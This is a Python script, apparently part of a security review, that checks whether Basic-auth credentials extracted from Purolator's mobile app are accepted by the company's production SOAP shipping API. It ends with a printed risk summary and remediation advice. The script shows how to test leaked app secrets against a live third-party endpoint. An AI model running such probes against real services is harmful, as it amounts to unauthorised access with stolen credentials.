"""
Purolator SOAP API Credential Test
Tests if extracted Basic auth credentials work for read-only operations
"""

import base64
import os

import requests
from requests.auth import HTTPBasicAuth

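# The credential is supplied through the environment as base64("user:password"),
# the same shape the Basic-auth header carries. Base64 is an encoding, not
# protection: a pair committed in source is a plaintext secret, and keeping it
# out of the file also keeps it out of version control and pasted logs.
# Only the account credential is exercised; the "credit" credential was decoded
# but never sent by this script, so it is not loaded at all.
ACCOUNT_CRED_ENV = "PUROLATOR_ACCOUNT_CRED_B64"

# SOAP API endpoint
BASE_URL = "https://webservices.purolator.com"
SHIPPING_SERVICE_PATH = "/EWS/v2/Shipping/ShippingService.asmx"

# Response headers worth surfacing when interpreting an authentication result.
DIAGNOSTIC_HEADERS = frozenset({"content-type", "www-authenticate", "x-amzn-errortype"})

# Minimal SOAP request used to exercise authentication. ValidateShipment is
# treated here as a non-mutating operation; that is an assumption about the
# remote service which this script cannot check — confirm it against the
# service documentation before pointing the script at a production endpoint.
SOAP_REQUEST = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" 
               xmlns:v2="http://purolator.com/pws/datatypes/v2">
  <soap:Header>
    <v2:RequestContext>
      <v2:Version>2.0</v2:Version>
      <v2:Language>en</v2:Language>
    </v2:RequestContext>
  </soap:Header>
  <soap:Body>
    <v2:ValidateShipmentRequest>
      <v2:Shipment>
        <v2:SenderInformation>
          <v2:Address>
            <v2:Name>Test</v2:Name>
            <v2:StreetNumber>123</v2:StreetNumber>
            <v2:StreetName>Test St</v2:StreetName>
            <v2:City>Toronto</v2:City>
            <v2:Province>ON</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>M5H2N2</v2:PostalCode>
          </v2:Address>
        </v2:SenderInformation>
        <v2:ReceiverInformation>
          <v2:Address>
            <v2:Name>Test</v2:Name>
            <v2:StreetNumber>456</v2:StreetNumber>
            <v2:StreetName>Test Ave</v2:StreetName>
            <v2:City>Vancouver</v2:City>
            <v2:Province>BC</v2:Province>
            <v2:Country>CA</v2:Country>
            <v2:PostalCode>V6B1A1</v2:PostalCode>
          </v2:Address>
        </v2:ReceiverInformation>
      </v2:Shipment>
    </v2:ValidateShipmentRequest>
  </soap:Body>
</soap:Envelope>"""

SOAP_HEADERS = {
    'Content-Type': 'text/xml; charset=utf-8',
    'SOAPAction': 'http://purolator.com/pws/service/v2/ValidateShipment'
}


def decode_basic_credential(b64_value: str) -> tuple[str, str]:
    """Decode a base64-encoded ``user:password`` pair.

    Args:
        b64_value: Base64 text in the form the Basic-auth scheme uses.

    Returns:
        ``(user, password)``. The split is on the first ``:`` only, so the
        password may itself contain ``:``.

    Raises:
        ValueError: if the input is not valid base64, does not decode as
            UTF-8, or lacks the ``:`` separator (including the empty string).
    """
    try:
        # validate=True rejects stray characters instead of silently dropping
        # them, so a mangled value fails loudly rather than yielding garbage.
        decoded = base64.b64decode(b64_value, validate=True).decode("utf-8")
    except ValueError as err:  # binascii.Error and UnicodeDecodeError are both ValueError
        raise ValueError("credential is not valid base64 UTF-8 text") from err
    user, sep, password = decoded.partition(":")
    if not sep:
        raise ValueError("credential must have the form 'user:password'")
    return user, password


def load_credential(env_name: str) -> tuple[str, str]:
    """Read and decode the credential held in environment variable *env_name*.

    Returns:
        ``(user, password)`` as produced by :func:`decode_basic_credential`.

    Raises:
        ValueError: if the variable is unset or empty, or its value does not
            decode into a ``user:password`` pair.
    """
    raw = os.environ.get(env_name, "").strip()
    if not raw:
        raise ValueError(f"environment variable {env_name} is not set")
    return decode_basic_credential(raw)


def check_endpoint(base_url: str, timeout: float = 10) -> None:
    """Test 1: report whether *base_url* answers a plain GET at all.

    Any HTTP status counts as "reachable"; only transport failures are
    reported as errors.
    """
    print("[TEST 1] Checking endpoint accessibility...")
    try:
        response = requests.get(base_url, timeout=timeout)
        print(f"✓ Endpoint reachable: HTTP {response.status_code}")
    except requests.exceptions.RequestException as e:
        # Only transport-level failures are expected here; a programming
        # error should propagate instead of being reported as "endpoint error".
        print(f"✗ Endpoint error: {e}")
    print()


def report_auth_response(response) -> None:
    """Print the parts of a SOAP response that show how authentication went.

    Args:
        response: an object exposing ``status_code``, ``headers`` (a mapping
            with ``items()``) and ``text``, as ``requests.Response`` does.
    """
    print(f"Response Status: HTTP {response.status_code}")
    print()
    print("Response Headers:")
    for key, value in response.headers.items():
        if key.lower() in DIAGNOSTIC_HEADERS:
            print(f"  {key}: {value}")
    print()

    status = response.status_code
    if status == 200:
        print("✓ SUCCESS: Credentials accepted!")
        print()
        print("Response preview (first 500 chars):")
        print(response.text[:500])
    elif status == 401:
        print("✗ UNAUTHORIZED: Credentials rejected")
        print()
        print("Response body:")
        print(response.text[:500])
    elif status == 403:
        print("⚠ FORBIDDEN: Credentials valid but access denied to this operation")
    else:
        print("⚠ Unexpected response")
        print()
        print("Response body (first 1000 chars):")
        print(response.text[:1000])


def probe_soap_auth(user: str, password: str, timeout: float = 15) -> None:
    """Test 2: send the minimal SOAP request with Basic auth and report the outcome.

    The password is never echoed; only its length is shown.
    """
    print("[TEST 2] Testing account credentials with SOAP request...")
    print(f"Username: {user}")
    print(f"Password: {'*' * len(password)}")
    print()

    try:
        response = requests.post(
            f"{BASE_URL}{SHIPPING_SERVICE_PATH}",
            data=SOAP_REQUEST,
            headers=SOAP_HEADERS,
            auth=HTTPBasicAuth(user, password),
            timeout=timeout,
        )
    # SSLError is a subclass of ConnectionError in requests, so it must be
    # matched first or the more specific message is never printed.
    except requests.exceptions.SSLError as e:
        print(f"✗ SSL Error: {e}")
        # NOTE(review): certificate pinning lives in the mobile client, not the
        # server, so it would not affect this script's TLS handshake; a TLS
        # error here more likely points at the server chain or the local trust store.
        print("  (This might indicate certificate pinning)")
    except requests.exceptions.ConnectionError as e:
        print(f"✗ Connection Error: {e}")
    except requests.exceptions.Timeout as e:
        print(f"✗ Timeout: {e}")
    except requests.exceptions.RequestException as e:
        # Catch-all for the remaining requests failures; non-requests errors propagate.
        print(f"✗ Error: {e}")
    else:
        report_auth_response(response)


def print_security_impact() -> None:
    """Print the closing risk summary and recommendations."""
    print()
    print("=" * 80)
    print("SECURITY IMPACT")
    print("=" * 80)
    print()
    print("If credentials work:")
    print("  - Attacker can interact with SOAP API")
    print("  - Depends on server-side validation for write operations")
    print("  - May need valid account numbers for billing operations")
    print()
    print("Recommendation:")
    print("  - Verify with PMA/EWS team what operations these credentials allow")
    print("  - Check if additional validation (device ID, user session) is required")
    print("  - Consider rotating these credentials if they're global")
    print()


def main() -> None:
    """Run both checks in order.

    Exits with status 2 before touching the network when the credential is
    missing or malformed, so a misconfigured run cannot be mistaken for a
    rejected credential.
    """
    print("=" * 80)
    print("PUROLATOR SOAP API CREDENTIAL TEST")
    print("=" * 80)
    print()
    print("Testing extracted credentials from mobile app...")
    print()

    try:
        account_user, account_pass = load_credential(ACCOUNT_CRED_ENV)
    except ValueError as err:
        print(f"✗ Cannot load credential: {err}")
        raise SystemExit(2)

    check_endpoint(BASE_URL)
    probe_soap_auth(account_user, account_pass)
    print_security_impact()


if __name__ == "__main__":
    main()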